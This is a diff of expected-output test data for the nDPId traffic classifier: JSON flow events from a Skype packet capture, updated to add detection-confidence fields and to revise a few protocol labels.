-00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970636044,"flow_last_seen":1431970646741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":1,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ApplePush.Apple","breed":"Safe","category":"Cloud"}}
-00623{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970654821,"flow_last_seen":1431970654821,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1431970636044,"flow_last_seen":1431970646741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":213,"flow_tot_l4_payload_len":590,"flow_avg_l4_payload_len":73,"midstream":1,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"17.143.160.149","dst_ip":"192.168.1.34","src_port":5223,"dst_port":50407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ApplePush","breed":"Acceptable","category":"Cloud"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431970686843,"flow_last_seen":1431970687201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.218.125","src_port":51286,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1431970668278,"flow_last_seen":1431970694737,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63342,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970699896,"flow_last_seen":1431970708272,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":13,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51311,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431970701508,"flow_last_seen":1431970702603,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":323,"flow_tot_l4_payload_len":719,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"93.79.224.176","src_port":51314,"dst_port":14506,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431970693196,"flow_last_seen":1431970706224,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":1,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":51302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00605{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00589{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970688560,"flow_last_seen":1431970700671,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":102,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":51291,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -1011,136 +1010,136 @@
 00590{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431970691351,"flow_last_seen":1431970701913,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51298,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00606{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431970692464,"flow_last_seen":1431970694362,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":15,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"82.224.110.241","src_port":51301,"dst_port":38895,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431970685839,"flow_last_seen":1431970687668,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648979,"flow_last_seen":1431970679027,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678945,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1431970685839,"flow_last_seen":1431970687668,"flow_idle_time":120000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648979,"flow_last_seen":1431970679027,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431970648880,"flow_last_seen":1431970678945,"flow_idle_time":180000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1004,"flow_avg_l4_payload_len":502,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1431970659834,"flow_last_seen":1431970689548,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":51251,"dst_port":40029,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970682971,"flow_last_seen":1431970692227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":14,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":51278,"dst_port":40009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00616{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
-00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664361,"flow_last_seen":1431970664361,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.0.254","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970664698,"flow_last_seen":1431970664698,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.229","dst_ip":"224.0.0.251","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00643{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970632290,"flow_last_seen":1431970632290,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.219","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1431970635325,"flow_last_seen":1431970688837,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":30,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63514,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431970651380,"flow_last_seen":1431970670192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":535,"flow_avg_l4_payload_len":35,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":51239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970681005,"flow_last_seen":1431970681005,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2146,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431970667913,"flow_last_seen":1431970667913,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1431970708726,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}}
